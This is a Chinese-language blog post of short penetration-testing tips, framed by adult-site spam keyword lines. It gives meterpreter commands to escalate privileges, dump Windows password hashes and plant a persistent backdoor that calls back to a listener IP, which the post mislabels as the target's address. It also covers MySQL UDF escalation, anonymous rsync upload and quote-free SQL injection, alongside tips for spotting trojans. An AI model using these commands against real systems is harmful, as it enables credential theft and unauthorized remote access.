成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

滲透測試筆記四

安全 黑客攻防
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。

滲透筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。

1、在Webshell中,如果上傳文件時提示缺少對象。可以嘗試寫一句話,用菜刀連接之后用菜刀上傳文件。

2、使用meterpreter的hashdump提取windows口令的哈希值:

  1. meterpreter > getuid                //獲知當前權限級別 
  2. meterpreter > getsystem        //提升權限 
  3. meterpreter > run hashdump 

3、網站http://www.md5decrypter.co.uk/,可提供對NTLM/LM hash值的在線解密(小編注:這個網站破解MD5的命中率也很高哦)。

3、使用meterpreter建立后門:

  1. meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1 
  2. -A參數用于在攻擊方機器上自動啟動監聽程序。 
  3. -S參數表示將后門程序設置為Windows系統啟動時加載。 
  4. -U參數表示后門設置為用戶登陸系統時自動執行。 
  5. -i參數用于設置后門回連到代理處理程序的時間間隔 
  6. -p是端口號 
  7. -r是目標機器的ip地址 

4、網絡縱深防御思想:作為一個公司,它會為物理線路聘用一個巡線員(第一層),在工作組交換機上做端口安全(第二層),在邊界路由器上做訪問列表(第三層),在防火墻中建立DMZ區和包過濾(第四層),設置IDS/IDP監測/阻攔(第三至七層),建立SSL通道(第六層),設置內容過濾(第七層),提供AAA服務(第七層),進行漏洞掃描(第四至七層)和病毒掃描(第七層)等。

——摘自《IT安全面試攻略》

5、IPS設備可以提供攻擊檢測和防御兩種功能,如果以鏡像方式接入,就使用反應機制;如果以串行方式接入,就使用阻斷機制。

6、根據ip獲知對方電腦的名稱:ping -a ip地址,

如:ping -a 192.168.235.253

 

QQ截圖20131205215004

 

7、在系統“windows”文件夾下,點擊打開“system.ini”文件,在代碼中如果有[boot]代碼,其中shell語句的格式一般為“shell=文件名”,如果后面還跟有一個文件名(如shell=文件名+文件名),則很可能是木馬程序。

8、在系統“windows”文件夾下,點擊打開“win.ini”文件,在代碼中如果有“run=?”或者“load=?”代碼類型,一定要注意其后的文件。一般情況下,“run=”和“load=”后面就沒有內容了,如果有路徑或不熟悉的文件名,可能就是木馬程序。

9、木馬隱藏的方式很多,一般都隱藏在注冊表的

1HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

目錄下。查看鍵值中有沒有不熟悉的可執行文件,該類文件可能就是木馬程序。

10、專門捕獲網頁的嗅探器——艾菲網頁偵探:艾菲網頁偵探是一個HTTP協議的網絡嗅探器,專門捕捉局域網中含有HTTP協議的數據包,并對其進行分析,找出符合過濾器的那些HTTP通信內容。

11、常見的windows XP系統漏洞:RDP漏洞、遠程明文賬戶名傳送漏洞、UPnP緩沖溢出漏洞、熱鍵漏洞、拒絕服務漏洞

12、常見window 7系統漏洞:內核驅動程序中的漏洞、輔助驅動程序中的漏洞、IE的積累性安全更新漏洞、顏色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。

13、清除BIOS密碼之魔法攻擊法:如果你能進入系統,可以用BiosPwds、CmosPwd等軟件清除。(小編注:一般就別想了)

14、清除BIOS密碼之物理攻擊法:關閉電源,將主板上的正確跳線帽用專業工具挑出,將跳線帽由原來標示為“1”、“2”針腳套在標示為“2”、“3”的針腳上,再將跳線帽復原,打開電源,即可發現BIOS密碼已清除。如果遇到較老的機子,可是拆掉電池、再用導電工具短接清除密碼。

15、mysql數據庫擁有讀寫文件權限時,成功寫入文件的條件需單引號不轉義、不可覆蓋已存在文件、必須為最后一條語句。因此magic_quotes_gpc必須為0ff。

16、滲透提權過程中,得知mysql數據庫連接賬號和密碼時可以嘗試UDF方式提權,前提是系統必須為windows。當然如果權限高的話,還可以使用mof寫入系統的方式提權。

17、滲透過程中如目標開啟rsync服務,默認873端口,可嘗試無口令登錄,權限設置不足的可直接上傳文件,最不濟也可查看目標站點文件。

18、端口轉發時如果lcx不起作用,可嘗試reduh這個工具,不過速度稍微有點捉急!(其實那速度會讓你有砸鍵盤的沖動)

19、數字型注入中,無單引號注入方法有兩種,一種是定義注入字符串為16進制賦值變量@r,然后exec(@r)執行;另外一種是使用char()函數和“+”號來進行。

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
相關推薦

2013-11-28 11:29:39

2013-11-28 13:03:17

2014-02-18 15:53:04

2013-12-24 13:15:59

2013-12-30 13:11:03

2014-04-03 09:35:28

2013-11-28 10:32:10

2009-01-07 21:00:05

2014-11-21 10:32:33

2014-05-16 10:55:47

Spark

2017-07-24 17:00:49

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2016-09-09 01:14:17

2010-08-03 22:09:16

2022-07-19 16:59:25

安全漏洞Web

2013-05-27 13:37:06

2010-09-09 21:10:22

2010-09-16 16:08:46

2016-10-10 22:11:02

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 夜色www国产精品资源站 | 免费视频一区二区 | 久久久久国产一区二区三区 | 91精品国产综合久久国产大片 | 亚洲一一在线 | 97视频在线观看免费 | 日韩欧美国产精品一区 | 91精品国产91久久综合桃花 | 国产精品久久久久久久一区二区 | 成人欧美一区二区三区在线观看 | 国产日韩一区二区三免费高清 | 神马久久久久久久久久 | 亚洲精品一区二区网址 | 日韩一级免费大片 | 日韩手机在线看片 | 国产欧美在线 | 中文字幕在线观看日韩 | 美女毛片免费看 | 日韩免费高清视频 | jlzzjlzz国产精品久久 | 精品久久久久久久久久 | 久久免费观看一级毛片 | 精品亚洲一区二区 | 美国十次成人欧美色导视频 | 国产激情一区二区三区 | 成人免费视频 | a视频在线| 影音先锋中文在线 | www.亚洲 | 中文字幕在线精品 | 中文字幕蜜臀av | 亚洲av毛片成人精品 | 日本特黄a级高清免费大片 特黄色一级毛片 | 99在线免费观看视频 | 国产精品日韩一区二区 | 亚洲精品久久久一区二区三区 | 精品国产一区二区三区性色 | 日韩精品视频中文字幕 | 亚洲人成在线观看 | 在线欧美亚洲 | 91精品国产91久久久久久最新 |